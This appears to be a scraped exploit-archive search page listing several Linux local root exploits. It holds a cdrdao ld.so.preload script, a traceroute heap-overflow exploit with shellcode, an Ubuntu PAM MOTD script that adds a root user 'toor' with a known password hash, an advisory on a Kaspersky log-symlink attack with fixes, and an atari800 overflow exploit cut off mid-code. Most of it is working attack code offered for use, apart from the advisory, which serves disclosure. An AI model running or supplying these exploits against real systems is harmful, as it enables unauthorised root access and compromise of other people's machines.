local root 2.6.18-194.32
Search result for 'local root 2.6.18-194.32'
(0.0615701675415 seconds)
Karol Wiêsek/CDRDAO Local Root Exploit ( linux)
#!/bin/sh
DIR=`pwd`
echo ""
echo "cdrdao local root exploit - gr doesn't protect you this time"
echo "Karol Wiêsek <appelast*drumnbass.art.pl>"
echo ""
sleep 2
umask 000
echo -n "[*] Checking if /etc/ld.so.preload doesn't exist ... "
if [ -f /etc/ld.so.preload ]; then
echo "WRONG"
echo "/etc/ld.so.preload exists, write another exploit ;P"
exit
else
echo "OK"
fi
echo -n "[*] Checking if su is setuid ... "
if [ -u /bin/su ];then
echo "OK"
else
echo "WRONG"
exit
fi
echo -n "[*] Creating evil *uid() library ... "
cat > getuid_lib.c << _EOF
int getuid(void) {
return 0; }
_EOF
gcc -o getuid_lib.o -c getuid_lib.c
ld -shared -o getuid_lib.so getuid_lib.o
rm -f getuid_lib.c getuid_lib.o
if [ -f ./getuid_lib.so ]; then
echo "OK"
else
echo "WRONG"
fi
echo -n "[*] Creating suidshell ... "
cat > suid.c << _EOF
int main(void) {
setgid(0); setuid(0);
unlink("./suid");
execl("/bin/sh","sh",0); }
_EOF
gcc -o suid suid.c
rm -f suid.c
if [ -x ./suid ];then
echo "OK"
else
echo "WRONG"
exit
fi
echo -n "[*] Exploiting cdrdao ... "
ln -sf /etc/ld.so.preload $HOME/.cdrdao
if [ ! -L $HOME/.cdrdao ];then
echo "Could'n link to \$HOME/.cdrdao"
exit
fi
cdrdao unlock --save 2>/dev/null
>/etc/ld.so.preload
echo "$DIR/getuid_lib.so" > /etc/ld.so.preload
su - -c "rm /etc/ld.so.preload; chown root:root $DIR/suid; chmod +s $DIR/suid"
if [ -s ./suid ];then
echo "OK"
else
echo "WRONG"
exit
fi
rm -f getuid_lib.so
unlink $HOME/.cdrdao
echo "Entering rootshell ... ;]"
./suid
# milw0rm.com [2004-09-07]
Michel Kaempf/traceroute Local Root Exploit ( linux)
/*
* MasterSecuritY <www.mastersecurity.fr>
*
* openwall.c - Local root exploit in LBNL traceroute
* Copyright (C) 2000 Michel "MaXX" Kaempf <maxx@mastersecurity.fr>
*
* Updated versions of this exploit and the corresponding advisory will
* be made available at:
*
* ftp://maxx.via.ecp.fr/traceroot/
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define PREV_INUSE 0x1
#define IS_MMAPPED 0x2
char * filename = "/usr/sbin/traceroute";
unsigned int stack = 0xc0000000 - 4;
unsigned int p = 0x0804ce38;
unsigned int victim = 0x0804c88c;
char * jmp = "\xeb\x0aXXYYYYZZZZ";
char * shellcode =
/* <shellcode>: xor %edx,%edx */
"\x31\xd2"
/* <shellcode+2>: mov %edx,%eax */
"\x89\xd0"
/* <shellcode+4>: mov $0xb,%al */
"\xb0\x0b"
/* <shellcode+6>: mov $XXXX,%ebx */
"\xbbXXXX"
/* <shellcode+11>: mov $XXXX,%ecx */
"\xb9XXXX"
/* <shellcode+16>: mov %ebx,(%ecx) */
"\x89\x19"
/* <shellcode+18>: mov %edx,0x4(%ecx) */
"\x89\x51\x04"
/* <shellcode+21>: int $0x80 */
"\xcd\x80";
char * program = "/bin/sh";
int zero( unsigned int ui )
{
if ( !(ui & 0xff000000) || !(ui & 0x00ff0000) || !(ui & 0x0000ff00) || !(ui & 0x000000ff) ) {
return( -1 );
}
return( 0 );
}
int main()
{
char gateway[ 1337 ];
char host[ 1337 ];
char * argv[] = { filename, "-g", "123", "-g", gateway, host, NULL };
unsigned int next;
int i;
unsigned int hellcode;
unsigned int size;
strcpy( host, "AAAABBBBCCCCDDDDEEEE" );
next = stack - (strlen(filename) + 1) - (strlen(host) + 1) + strlen("AAAA");
for ( i = 0; i < next - (next & ~3); i++ ) {
strcat( host, "X" );
}
next = next & ~3;
((unsigned int *)host)[1] = 0xffffffff & ~PREV_INUSE;
((unsigned int *)host)[2] = 0xffffffff;
if ( zero( victim - 12 ) ) {
fprintf( stderr, "Null byte(s) in `victim - 12' (0x%08x)!\n", victim - 12 );
return( -1 );
}
((unsigned int *)host)[3] = victim - 12;
hellcode = p + (strlen("123") + 1) + strlen("0x42.0x42.0x42.0x42") + strlen(" ");
if ( zero( hellcode ) ) {
fprintf( stderr, "Null byte(s) in `host' (0x%08x)!\n", hellcode );
return( -1 );
}
((unsigned int *)host)[4] = hellcode;
size = next - (p - 4);
size = size | PREV_INUSE;
sprintf(
gateway,
"0x%02x.0x%02x.0x%02x.0x%02x",
((unsigned char *)(&size))[0],
((unsigned char *)(&size))[1],
((unsigned char *)(&size))[2],
((unsigned char *)(&size))[3]
);
strcat( gateway, " " );
strcat( gateway, jmp );
strcat( gateway, shellcode );
strcat( gateway, program );
hellcode += strlen(jmp) + strlen(shellcode);
if ( zero( hellcode ) ) {
fprintf( stderr, "Null byte(s) in `gateway' (0x%08x)!\n", hellcode );
return( -1 );
}
*((unsigned int *)(gateway + strlen("0x42.0x42.0x42.0x42") + strlen(" ") + strlen(jmp) + 7)) = hellcode;
hellcode += strlen(program) + 1;
if ( zero( hellcode ) ) {
fprintf( stderr, "Null byte(s) in `gateway' (0x%08x)!\n", hellcode );
return( -1 );
}
*((unsigned int *)(gateway + strlen("0x42.0x42.0x42.0x42") + strlen(" ") + strlen(jmp) + 12)) = hellcode;
execve( argv[0], argv, NULL );
return( -1 );
}
// milw0rm.com [2000-11-15]
anonymous/Ubuntu PAM MOTD Local Root ( na)
#!/bin/bash
#
# Exploit Title: Ubuntu PAM MOTD local root
# Date: July 9, 2010
# Author: Anonymous
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)
# CVE: CVE-2010-0832
# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i
# References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen
#
# Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow.
# Does not prompt for login by creating temporary SSH key and authorized_keys entry.
#
# user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh
# [*] Ubuntu PAM MOTD local root
# [*] Backuped /home/user/.ssh/authorized_keys
# [*] SSH key set up
# [*] Backuped /home/user/.cache
# [*] spawn ssh
# [+] owned: /etc/passwd
# [*] spawn ssh
# [+] owned: /etc/shadow
# [*] Restored /home/user/.cache
# [*] Restored /home/user/.ssh/authorized_keys
# [*] SSH key removed
# [+] Success! Use password toor to get root
# Password:
# root@ubuntu:/home/user# id
# uid=0(root) gid=0(root) groupes=0(root)
#
P='toor:x:0:0:root:/root:/bin/bash'
S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::'
echo "[*] Ubuntu PAM MOTD local root"
[ -z "$(which ssh)" ] && echo "[-] ssh is a requirement" && exit 1
[ -z "$(which ssh-keygen)" ] && echo "[-] ssh-keygen is a requirement" && exit 1
[ -z "$(ps -u root |grep sshd)" ] && echo "[-] a running sshd is a requirement" && exit 1
backup() {
[ -e "$1" ] && [ -e "$1".bak ] && rm -rf "$1".bak
[ -e "$1" ] || return 0
mv "$1"{,.bak} || return 1
echo "[*] Backuped $1"
}
restore() {
[ -e "$1" ] && rm -rf "$1"
[ -e "$1".bak ] || return 0
mv "$1"{.bak,} || return 1
echo "[*] Restored $1"
}
key_create() {
backup ~/.ssh/authorized_keys
ssh-keygen -q -t rsa -N '' -C 'pam' -f "$KEY" || return 1
[ ! -d ~/.ssh ] && { mkdir ~/.ssh || return 1; }
mv "$KEY.pub" ~/.ssh/authorized_keys || return 1
echo "[*] SSH key set up"
}
key_remove() {
rm -f "$KEY"
restore ~/.ssh/authorized_keys
echo "[*] SSH key removed"
}
own() {
[ -e ~/.cache ] && rm -rf ~/.cache
ln -s "$1" ~/.cache || return 1
echo "[*] spawn ssh"
ssh -o 'NoHostAuthenticationForLocalhost yes' -i "$KEY" localhost true
[ -w "$1" ] || { echo "[-] Own $1 failed"; restore ~/.cache; bye; }
echo "[+] owned: $1"
}
bye() {
key_remove
exit 1
}
KEY="$(mktemp -u)"
key_create || { echo "[-] Failed to setup SSH key"; exit 1; }
backup ~/.cache || { echo "[-] Failed to backup ~/.cache"; bye; }
own /etc/passwd && echo "$P" >> /etc/passwd
own /etc/shadow && echo "$S" >> /etc/shadow
restore ~/.cache || { echo "[-] Failed to restore ~/.cache"; bye; }
key_remove
echo "[+] Success! Use password toor to get root"
su -c "sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \
chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash" toor
Ubuntu PAM MOTD local root exploit.
Dr. Peter Bieringer/kavLocalRoot.txt ( na)
FYI,
a new version is already available and a proposed workaround is described
at the end of the advisory.
Peter
URLs for this document:
ftp://ftp.aerasec.de/pub/advisories/kav4unix/kav4unix-local-root-exploit.txt
(TXT)
(P) & (C) 2005 AERAsec Network Services and Security GmbH
The information in this advisory may be freely distributed or reproduced,
provided that the advisory is not modified in any way.
Author: Dr. Peter Bieringer
Contact: info at aerasec dot de
Version: 2005-08-12
Title: Insecure directory permissions of default installation of Kaspersky
Anti-Virus for Unix/Linux File Servers will lead to local root exploit
Description:
Because of insecure permissions (777) of the kav log directory, any
unprivileged local user is able to remove the log file and replace it with
a symlink. Because of file names beeing logged, a symlink pointing to
/etc/passwd can be used to create additional users with root permissions
and empty password.
Additional URLs:
<TO BE FILLED LATER>
Change Log:
2005-06-14: initial version (internal)
2005-07-29: update because of availability of new version (internal)
Vendor notification/information:
2005-04-19: to support@kaspersky.com about insecure permissions in general
in
version 5.0-5 -> no reaction
2005-04-29: to German techsupport about insecure permissions in general in
version 5.0-5 -> got insuffient answer at 2005-05-11
2005-06-14: to support@kaspersky.com about a possible local-root exploit in
version 5.5-2 -> got response on 2005-06-15
2005-07-26: got new version 5.5-3 from vendor for testing
2005-08-12: minor review before publishing
Tested version:
===============
kav4fileservers-linux-5.5-2.i386.rpm
URL:
ftp://ftp.kaspersky.com/products/release/english/businessoptimal/file_servers/kavlinuxserver/
Probably also affected versions:
kav4fileservers-linux-5.0-5.i386.rpm
kav4mailservers-linux-*
How to reproduce:
=================
1) Install software:
--------------------
# rpm -ihv kav4fileservers-linux-5.5-2.i386.rpm
Preparing... ###########################################
[100%]
1:kav4fileservers-linux ###########################################
[100%]
Kaspersky Anti-Virus for Unix has been installed successfully
but needs to be properly configured before using.
Unfortunately, RPM is not able to run scripts interactively, so
please run /opt/kav/5.5/kav4unix/setup/postinstall.pl
script by yourself to configure it.
2) Configure software:
----------------------
# /opt/kav/5.5/kav4unix/setup/postinstall.pl
Installing license files.
License file (a file with .key extension) is your personal
license key. You need to install it to use the application.
To install it right now, just enter the path to the location of
your license file (enter an empty string to continue without key
file installation):
.
License file ./********.key has been installed
Configuring KeepUp2Date proxy settings.
If you use an http proxy server to access the Internet, you need
to tell the Kaspersky Anti-Virus for Unix KeepUp2Date component
about it. Please enter the address of your http proxy server in
one of the following forms, http://proxyIP:port or
http://user:pass@proxyIP:port. If you don't have or need a proxy
server to access the Internet, enter 'no' here:
Latest anti-virus bases are an essential part of your anti-virus
protection. Do you want to download the latest anti-virus bases
right now to insure your application is up to date? (If you
answer 'yes', make sure you are connected to the Internet):
[yes]:
Running keepup2date to update your anti-virus database.
Kaspersky KeepUp2Date 5.5.2/RELEASE build #98
Copyright (C) Kaspersky Lab, 1997-2005.
Portions Copyright (C) Lan Crypto
Configuration file: /etc/kav/5.5/kav4unix/kav4unix.conf
Getting product configuration
Getting updater configuration
Checking product license keys
Initializing
Trying to update from 'http://ru2h.kaspersky-labs.com'
Copying update description file
Downloading remote file master.xml
Checking update description file integrity
Parsing update description file
Downloading remote file kavset.xml
Copying files
Downloading remote file kavset.xml
Downloading remote file avcmhk4.dll
...
Checking license keys
Downloading remote file ca.avc
...
Checking new bases
Standard AV bases are OK, latest update: 14-06-2005, total records: 126143.
Extended AV bases are OK, latest update: 14-06-2005, total records: 133575.
Redundant AV bases are OK, latest update: 14-06-2005, total records: 134617.
Clearing reserve dir
Replacing files
Saving updater settings
Saving updater settings
Default Webmin configuration file was not found. This means that
either Webmin is not installed at all, or is installed into a
non-default location.
Webmin (www.webmin.com) is a web-based interface for system
administration for various Unix components. If you install it,
you'll be able to configure and use Kaspersky Anti-Virus through
the web interface. If you want to use this functionality, but
haven't installed Webmin yet, you can skip this stage and
install this module later using Webmin's built-in installation
procedure.
If you have Webmin installed in a non-default path, please enter
the path to the location of the Webmin configuration file, or
leave blank to skip?
If you want to use this module later, you can install it using
Webmin's own installation procedure. The module will be placed
in /opt/kav/5.5/kav4unix/contrib/kavfs.wbm.
Would you like to compile the kavmonitor module [Y]:
Enter the linux kernel source path [/lib/modules/2.6.9-5.EL/build]:
checking for gcc... gcc
checking for C compiler default output... a.out
checking whether the C compiler works... yes
checking whether we are cross compiling... no
checking for suffix of executables...
checking for suffix of object files... o
checking whether we are using the GNU C compiler... yes
checking whether gcc accepts -g... yes
checking for gcc option to accept ANSI C... none needed
checking build system type... i686-pc-linux-gnu
checking host system type... i686-pc-linux-gnu
checking target system type... i686-pc-linux-gnu
LSB_VERSION="1.3"
checking for linux kernel sources... /lib/modules/2.6.9-5.EL/build
checking for linux kernel version... 2.6
checking for vmlinux... "not found"
checking for sys_close is exported... "yes"
checking for do_execve is exported... no, do_execve address=0xc016f3b2
configure: creating ./config.status
config.status: creating Makefile
config.status: creating kavmon.h
config.status: creating osdef.h
config.status: creating module.linux/Makefile
Cleaning module.linux
make[1]: Entering directory `/opt/kav/5.5/kav4unix/src/module.linux'
rm -f **.o *.ko ../bin//kavmon.ko monitor_helpers.c kernel.c queue.c md5.c
cache.c util.c cache.h kavmon.h kernel.h md5.h monitor.h
monitor_helpers.h osdef.h queue.h util.h *.mod.c Makefile.in
make[1]: Leaving directory `/opt/kav/5.5/kav4unix/src/module.linux'
Making link in module.linux
make[1]: Entering directory `/opt/kav/5.5/kav4unix/src/module.linux'
make -C /lib/modules/2.6.9-5.EL/build
SUBDIRS=/opt/kav/5.5/kav4unix/src/module.linux modules
make[2]: Entering directory `/usr/src/kernels/2.6.9-5.EL-i686'
CC [M] /opt/kav/5.5/kav4unix/src/module.linux/utils.o
CC [M] /opt/kav/5.5/kav4unix/src/module.linux/module.o
CC [M] /opt/kav/5.5/kav4unix/src/module.linux/interface.o
CC [M] /opt/kav/5.5/kav4unix/src/module.linux/interface_monitor.o
CC [M] /opt/kav/5.5/kav4unix/src/module.linux/interface_exploit.o
CC [M] /opt/kav/5.5/kav4unix/src/module.linux/interceptor.o
CC [M] /opt/kav/5.5/kav4unix/src/module.linux/files.o
CC [M] /opt/kav/5.5/kav4unix/src/module.linux/monitor_helpers.o
CC [M] /opt/kav/5.5/kav4unix/src/module.linux/kernel.o
CC [M] /opt/kav/5.5/kav4unix/src/module.linux/queue.o
/opt/kav/5.5/kav4unix/src/module.linux/queue.c: In function
`queue_read_interface':
/opt/kav/5.5/kav4unix/src/module.linux/queue.c:450: warning:
`interruptible_sleep_on' is deprecated (declared at
include/linux/wait.h:290)
CC [M] /opt/kav/5.5/kav4unix/src/module.linux/md5.o
CC [M] /opt/kav/5.5/kav4unix/src/module.linux/cache.o
CC [M] /opt/kav/5.5/kav4unix/src/module.linux/util.o
LD [M] /opt/kav/5.5/kav4unix/src/module.linux/kavmon.o
Building modules, stage 2.
MODPOST
CC /opt/kav/5.5/kav4unix/src/module.linux/kavmon.mod.o
LD [M] /opt/kav/5.5/kav4unix/src/module.linux/kavmon.ko
make[2]: Leaving directory `/usr/src/kernels/2.6.9-5.EL-i686'
make[1]: Leaving directory `/opt/kav/5.5/kav4unix/src/module.linux'
Kaspersky Anti-Virus for Unix is installed.
Configuration file was installed in
/etc/kav/5.5/kav4unix/kav4unix.conf
Binaries were installed in /opt/kav/5.5/kav4unix/bin
3) Start kavmonitor
-------------------
# /etc/rc.d/init.d/kavmonitor start
kavmonitor started
4) Check permissions of log directory
-------------------------------------
# stat /var/log/kav/5.5/kav4unix
File: `/var/log/kav/5.5/kav4unix'
Size: 4096 Blocks: 16 IO Block: 4096 directory
Device: 301h/769d Inode: 229107 Links: 2
Access: (0777/drwxrwxrwx) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2005-06-14 13:53:37.263023968 +0200
Modify: 2005-06-14 13:53:19.987650224 +0200
Change: 2005-06-14 13:53:19.987650224 +0200
# ll /var/log/kav/5.5/kav4unix
total 32
-rw-r--r-- 1 root root 1933 Jun 14 13:53 kavmonitor.log
-rw-r--r-- 1 root root 18778 Jun 14 13:51 kavupdater.log
-> Note the 0777/drwxrwxrwx of /var/log/kav/5.5/kav4unix
5) Prepare the attack
---------------------
a) Setup an unprivileged local user, e.g. named "test":
b) Switch to user "test":
$ id
uid=1001(test) gid=1001(test) groups=1001(test)
c) Check whether "kavmonitor" is logging well:
$ tail -f /var/log/kav/5.5/kav4unix/kavmonitor.log
[14/06/05 13:54:53 A] pid=7815 uid=1001 /home/test/.bash_profile OPEN
OK
[14/06/05 13:54:53 A] pid=7815 uid=1001 /home/test/.bashrc OPEN OK
[14/06/05 13:55:50 A] pid=7842 uid=1001 /bin/dd EXEC OK
[14/06/05 13:55:50 A] pid=7842 uid=1001 /home/test/urandom-10k.bin CLOSE
OK
[14/06/05 13:56:05 A] pid=7844 uid=1001 /usr/bin/hexdump EXEC OK
[14/06/05 13:56:06 A] pid=7844 uid=1001 /home/test/urandom-10k.bin OPEN
OK
[14/06/05 13:56:12 A] pid=7846 uid=1001 /usr/bin/head EXEC OK
[14/06/05 13:56:24 A] pid=7847 uid=1001 /usr/bin/tail EXEC OK
[14/06/05 13:56:24 A] pid=7847 uid=1001 /lib/tls/libm-2.3.4.so OPEN OK
[14/06/05 13:56:24 A] pid=7847 uid=1001
/var/log/kav/5.5/kav4unix/kavmonitor.log OPEN OK
-> Note that an unprivileged user can take a look at the log file. Nice to
see which
files other users are accessing during the time...
d) Create a special file:
$ echo "Test" > "
hacker::0:0:hacker::
"
-> Note that the line breaks are created by typing CTRL-V CTRL-J
e) Take a look at the result:
$ ll
total 32
-rw-rw-r-- 1 test test 5 Jun 14 14:58 ?hacker::0:0:hacker::?
f) Now access the file to see what kavmonitor will log:
$ cat *
Test
$ tail -f /var/log/kav/5.5/kav4unix/kavmonitor.log
...
[14/06/05 15:30:07 A] pid=27354 uid=1001 /home/test/
hacker::0:0:hacker::
OPEN OK
-> Note that this looks very good now ;-)
6) Start the attack
-------------------
a) Rename the log file, you can do this because of 0777 permissions of the
directory
$ mv /var/log/kav/5.5/kav4unix/kavmonitor.log
/var/log/kav/5.5/kav4unix/kavmonitor.log.orig
b) Create a symlink pointing to /etc/passwd
$ ln -s /etc/passwd /var/log/kav/5.5/kav4unix/kavmonitor.log
c) Wait until next system reboot or manual restart of "kavmonitor"
-> Note that "kavmonitor" doesn't check whether the log file is a symlink or
not, by default it opens the file for appending data.
-> Watch the result
$ tail -f /etc/passwd
[14/06/05 15:42:30 I] There are 1 Kaspersky license keys found:
[14/06/05 15:42:30 I] License file ********.key, serial ****-*****-********,
"Kaspersky Anti-Virus Business Optimal for Linux File Server", expires
**-**-2005 in *** days
[14/06/05 15:42:31 A] pid=1984 uid=0 /etc/mtab OPEN OK
[14/06/05 15:42:33 A] pid=27483 uid=1001 /usr/bin/tail EXEC OK
[14/06/05 15:42:33 A] pid=27483 uid=1001 /etc/ld.so.cache OPEN OK
[14/06/05 15:42:33 A] pid=27483 uid=1001 /lib/tls/libm-2.3.4.so OPEN OK
[14/06/05 15:42:33 A] pid=27483 uid=1001 /lib/tls/librt-2.3.4.so OPEN
OK
[14/06/05 15:42:33 A] pid=27483 uid=1001 /lib/tls/libc-2.3.4.so OPEN OK
[14/06/05 15:42:33 A] pid=27483 uid=1001 /lib/tls/libpthread-2.3.4.so OPEN
OK
[14/06/05 15:42:33 A] pid=27483 uid=1001 /usr/lib/locale/locale-archive OPEN
OK
[14/06/05 15:42:33 A] pid=27483 uid=1001 /etc/passwd OPEN OK
[14/06/05 15:42:40 A] pid=1807 uid=0 /etc/group OPEN OK
[14/06/05 15:42:40 A] pid=1807 uid=0 /etc/cups/certs/0 CLOSE OK
-> Voila, one step before success
d) Now access the file to see what kavmonitor will log again:
$ cat *
Test
$ tail -f /etc/passwd
...
[14/06/05 15:45:57 A] pid=27521 uid=1001 /home/test/
hacker::0:0:hacker::
OPEN OK
-> Bingo, login/pam usually skip not proper looking entries, so the
additional
log lines don't cause any confusion.
e) Switch to the new created user:
$ su hacker
sh-3.00# id
uid=0(root) gid=0(root) groups=0(root)
-> Take care, what you're doing now, because you have root permissions from
now on ;-)
How to protect against this attack:
===================================
1) Administrator related (in case update is not possible):
----------------------------------------------------------
a) Fix permissions of log directory (default: 0777)
# chmod 750 /var/log/kav/5.5/kav4unix
b) Fix permissions of licenses directory (default: 0777)
# chmod 755 /var/db/kav/5.5/kav4unix/licenses
-> Note that otherwise a malicious user can delete the key which prevent
"keepup2date" from proper working
2) Vendor related:
------------------
* Upgrade to at least version 5.5-3. It introduces system user/group
"kluser"/"klusers" and adjusted permissions to prevent normal users
from running the exploit.
The new installer already mentioned about this:
<B>Warning:</B> some files/directories have insecure permissions.
This is a big security risk. It leads to known <B>local root exploit</B>
if
any malicious user has access to this computer. We suggest to fix it by
changing the permissions to 775 (or 770). Unfortunately that after the
fix,
you will not be able to run keepup2date from non-root user anymore.
Answer 'Y' if you want fix the permissions now, 'N' if you want to left
them
intact, and '?' to see the list of directories and permissions/owners to
be
changed.
Note that the new installer doesn't take care that "kluser"/"klusers"
should be created at system user/group. At least Red Hat Linux systems
would support this by using "-r". We suggest to create them *before*
installing the new version - this prevents mix-up of uid/gid with normal
users:
# groupadd -r klusers
# useradd -r -g klusers -s /sbin/nologin -d /var/db/kav kluser
Then install the package
If non-root user (like e.g. amavis) should be able to use "kavscanner",
proper permissions need to be set after adding the user to the group
"klusers":
# chgrp klusers /var/db/kav/5.5
# chmod g+ws /var/db/kav/5.5
# touch /var/db/kav/5.5/ichecker.db
# chmod g+w,o-rwx /var/db/kav/5.5/ichecker.db
--
Dr. Peter Bieringer Phone: +49-8102-895190
AERAsec Network Services and Security GmbH Fax: +49-8102-895199
Wagenberger Strasse 1
D-85662 Hohenbrunn E-Mail: pbieringer@aerasec.de
Germany Internet: http://www.aerasec.de
Due to the logs directory being 777 by default, Kaspersky AntiVirus 5.5 is susceptible to a local root exploit via a symlink attack. Details are provided.
pi3/atari800 Local Root Exploit ( linux)
/*
* Exploit for atari800 by pi3 (pi3ki31ny)
*
* pi3@pi3:~$ ./p
*
* ...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...
*
* Ussage:
* [+] ./p [options]
*
* -? <this help screen>
* -v choose a bug:
* 1 - first bug (in all versions Atari800)
* 2 - second bug (in older Atari800 - modiy argv[0])
* 3 - third bug (in config file - OS/A_ROM)
* 4 - fourth bug (in config file - OS/B_ROM)
* 5 - fifth bug (in config file - XL/XE_ROM)
* 6 - sixth bug (in config file - BASIC_ROM)
* -o <offset>
* -p PATH
*
* pi3@pi3:~$
*
* Atari800 have suid bit in default instalation.
* Best regards pi3 (pi3ki31ny).
*
* "Kazdemu trafi sie gowno...!"
*
* Greetz: [greetz on my web] && other my friends (you know who you are)
*
* ...::: -=[ www.pi3.int.pl ]=- :::...
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <assert.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define PATH "/usr/local/bin/atari800"
#define DIRS 256
#define CONFIG ".atari800.cfg"
/* ...::: -=[ www.pi3.int.pl ]=- :::... */
char shellcode[] = "\x31\xdb\x31\xc0\x31\xd2\xb2\x2d\x6a\x0a\x68\x3a"
"\x2e\x2e\x2e\x68\x2d\x20\x3a\x3a\x68\x6c\x20\x5d"
"\x3d\x68\x6e\x74\x2e\x70\x68\x69\x33\x2e\x69\x68"
"\x77\x77\x2e\x70\x68\x3d\x5b\x20\x77\x68\x3a\x3a"
"\x20\x2d\x68\x2e\x2e\x2e\x3a\x89\xe1\xb0\x04\xcd"
"\x80"
/* setuid(0) */
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
/* setgid(0) */
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80"
/* exec /bin/sh */
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"
"\x80"
/* exit(0) */
"\x31\xdb\x89\xd8\xb0\x01\xcd\x80";
long ret_ad(char *a1, char *a2) {
// return (0xbffffffa-strlen(a1)-strlen(a2));
return 0xbfffee01;
}
int ussage(char *arg) {
printf("\n\t...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...\n");
printf("\n\tUssage:\n\t[+] %s [options]\n
-? <this help screen>
-v choose a bug:
1 - first bug (in all versions Atari800)
2 - second bug (in older Atari800 - modiy argv[0])
3 - third bug (in config file - OS/A_ROM)
4 - fourth bug (in config file - OS/B_ROM)
5 - fifth bug (in config file - XL/XE_ROM)
6 - sixth bug (in config file - BASIC_ROM)
-o <offset>
-p PATH\n\n",arg);
exit(-1);
}
int main(int argc, char *argv[]) {
long ret,*buf_addr;
char envp[8196],*path=PATH;
static char *sh[0x02];
char buf[DIRS],link[500],conf[5000];
int i,opt,op2=0,offset=0;
FILE *fp;
while((opt = getopt(argc,argv,"p:o:v:?")) != -1) {
switch(opt) {
case 'o':
offset=atoi(optarg);
break;
case 'p':
path=optarg;
break;
case 'v':
op2=atoi(optarg);
break;
case '?':
default:
ussage(argv[0]);
break;
}
}
if (op2==0)
ussage(argv[0]);
if ( (fp=fopen(path,"r"))==NULL) {
printf("\n*\tI can\'t open path to victim! - %s\t*\n\n",path);
ussage(argv[0]);
} fclose(fp);
if ( (fp=fopen(CONFIG,"r"))==NULL) {
if ( (fp=fopen(CONFIG,"w"))==NULL) {
printf("I can\'t create config file!\n");
exit(-1);
}
printf("\nCreating config file...\n\n\n");
fprintf(fp,"Atari 800 Emulator, Version 1.3.0\n");
fprintf(fp,"OS/A_ROM=atariosa.rom\n");
fprintf(fp,"OS/B_ROM=atariosb.rom\n");
fprintf(fp,"XL/XE_ROM=atarixl.rom\n");
fprintf(fp,"BASIC_ROM=ataribas.rom\n");
fprintf(fp,"5200_ROM=\n");
fprintf(fp,"DISK_DIR=.\n");
fprintf(fp,"ROM_DIR=.\n");
fprintf(fp,"H1_DIR=\n");
fprintf(fp,"H2_DIR=\n");
fprintf(fp,"H3_DIR=\n");
fprintf(fp,"H4_DIR=\n");
fprintf(fp,"HD_READ_ONLY=1\n");
fprintf(fp,"EXE_DIR=\n");
fprintf(fp,"STATE_DIR=\n");
fprintf(fp,"PRINT_COMMAND=lpr %s\n");
fprintf(fp,"SCREEN_REFRESH_RATIO=1\n");
fprintf(fp,"MACHINE_TYPE=Atari XL/XE\n");
fprintf(fp,"RAM_SIZE=64\n");
fprintf(fp,"DEFAULT_TV_MODE=PAL\n");
fprintf(fp,"DISABLE_BASIC=1\n");
fprintf(fp,"ENABLE_SIO_PATCH=1\n");
fprintf(fp,"ENABLE_H_PATCH=1\n");
fprintf(fp,"ENABLE_P_PATCH=1\n");
fprintf(fp,"ENABLE_NEW_POKEY=1\n");
fprintf(fp,"STEREO_POKEY=0\n");
} fclose(fp);
if (op2==1) {
printf("\n\t...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...\n");
printf("\n\t[+] Bulding buffors!\n");
ret=ret_ad(shellcode,path);
ret+=offset;
printf("\t[+] Using adres 0x%x\n",ret);
printf("\t[+] Using first bug in Atari800\n");
memset(envp,0x90,sizeof(envp));
for (i=0; i<strlen(shellcode); i++)
envp[8196-strlen(shellcode)+i] = shellcode[i];
sh[0x00]=envp;
sh[0x01]=NULL;
strcpy(link,"AA");
buf_addr=(long*)&link[2];
for(i=0;i<500;i+=4)
*(buf_addr)++ = ret;
link[499]='\0';
printf("\nExecuting the vuln program - %s\n\n",PATH);
execle(PATH,PATH,link,0,sh);
printf("Kazdemu trafi sie gowno...!\n");
return 0;
} else if (op2==2) {
system("rm -rf `perl -e 'print \"\\x41\"x250'`; rm -f 1");
printf("\n\t...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...\n");
printf("\n\t[+] Bulding buffors!\n");
ret=ret_ad(shellcode,path);
ret+=offset;
printf("\t[+] Using adres 0x%x\n",ret);
printf("\t[+] Using second bug in Atari800\n");
memset(envp,0x90,sizeof(envp));
for (i=0; i<strlen(shellcode); i++)
envp[8196-strlen(shellcode)+i] = shellcode[i];
sh[0x00]=envp;
sh[0x01]=NULL;
memset(buf,0x41,(size_t)250);
strcpy(link,"./");
memset(&link[2],0x41,(size_t)252);
assert(mkdir(buf, 0755) != -1);
assert(chdir(buf) != -1);
buf_addr=(long*)buf;
for (i=0; i<80; i+=4)
*(buf_addr)++ = ret;
buf[80]='\0';
